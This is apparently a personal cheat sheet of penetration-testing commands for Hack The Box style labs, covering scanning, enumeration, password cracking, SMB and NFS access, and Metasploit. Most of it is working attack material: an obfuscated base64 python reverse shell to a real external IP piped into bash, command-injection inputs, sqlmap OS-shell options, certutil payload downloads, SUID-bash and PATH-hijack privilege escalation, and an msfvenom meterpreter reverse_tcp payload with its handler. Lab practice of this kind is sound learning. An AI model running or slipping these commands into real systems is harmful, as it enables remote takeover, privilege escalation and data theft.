sudo nmap -n -sS -sV -Pn -p- 192.168.108.124 -min-rate 5000
gobuster dir -u http://192.168.108.124:5357 -w /usr/share/wordlists/dirb/common.txt
gobuster vhost -u http://thetoppers.htb -w /usr/share/wordlists/wfuzz/general/common.txt --append-domain
gobuster dns -d thetoppers.htb -w /usr/share/wordlists/wfuzz/general/common.txt
Also, Gobuster can be used to enumerate subdomain, it is very useful tools.
dirb http://192.168.108.124:5357
echo cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoIjU0LjIxMS42NC45NiIsMTIzNCkpO29zLmR1cDIocy5maWxlbm8oKSwwKTsgb3MuZHVwMihzLmZpbGVubygpLDEpO29zLmR1cDIocy5maWxlbm8oKSwyKTtpbXBvcnQgcHR5OyBwdHkuc3Bhd24oInNoIikn|base64 -d|bash
sudo gunzip /usr/share/wordlists/rockyou.txt.gz
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
zip2john crack_me.zip > hash.txt
& sleep 5
& ping -c 4 192.168.110.110
$ | ;
sudo tcpdump -i eth0 -n icmp
sqlmap -u "http://10.129.238.47/dashboard.php?search=123" --random-agent --threads 5 --batch --level=5 --risk=3 --sql-shell
--sql-shell
--os-shell (add --web-root=/var/www/html can specific the website path)
--dump-all
SELECT * FROM INFORMATION_SCHEMA.TABLES
SELECT schema_name FROM information_schema.schemata --show all db
SELECT table_name FROM information_schema.tables where table_schema='db name'--show all tables
python -m http.server 8000
pyenv local 2.7.16
Remind port 111
showmount -e 10.10.10.180
sudo mount -t nfs 10.10.10.180:/site_backups /home/kali/Desktop/site_backups
smbclient -L ////192.168.108.124 # list smb
smbclient -U "DOMAIN\user_name" //server_name/share_name # connect to smb share
smb: \> d /example/ # go to example directory
smb: \example\> get example.txt # download example.txt
sudo responder -I eth0
enum4linux 192.168.108.124
unmount
sudo umount -l /home/kali/Desktop/site_backups
certutil.exe -urlcache -split -f "http://10.10.14.10:8000/winPEAS.bat" winPEAS.bat
$url = "http://10.10.14.10:8000/winPEASany.exe"
$path = "C:\tmp\winPEASany.exe"
(New-Object System.Net.WebClient).DownloadFile($url,$path)https://github.com/carlospolop/PEASS-ng/releases/tag/20230702-bc7ce3ac
https://github.com/DominicBreuker/pspy/releases/tag/v1.2.1
:!/bin/bash
chmod u+s /bin/bash
ls -la /bin/bash
/bin/bash -p
cd /tmp
echo '/bin/bash' > cat
chmod +x cat
sudo PATH=/tmp:$PATH /opt/cleanup.sh
id
JuicyPotatoNG.exe -t * -p "C:\Windows\System32\powershell.exe" -a "revshell params"
https://github.com/Markakd/CVE-2022-2588
https://eslam3kl.medium.com/hack-the-box-legacy-c245030172ae
https://u1sp00kies.medium.com/hack-the-box-htb-blue-walkthrough-7dac9505bc9c
msfvenom --list format
msfvenom --list payloads
msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=192.168.119.121 LPORT=4444 -b '\x0A\x1A\x2F\x95\xA7\x00' -f raw -o exploit.txt
sudo msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.119.121
set lport 4444
run
search local_exploit_suggester
options
set session 1
run
bacground
sessions -i 1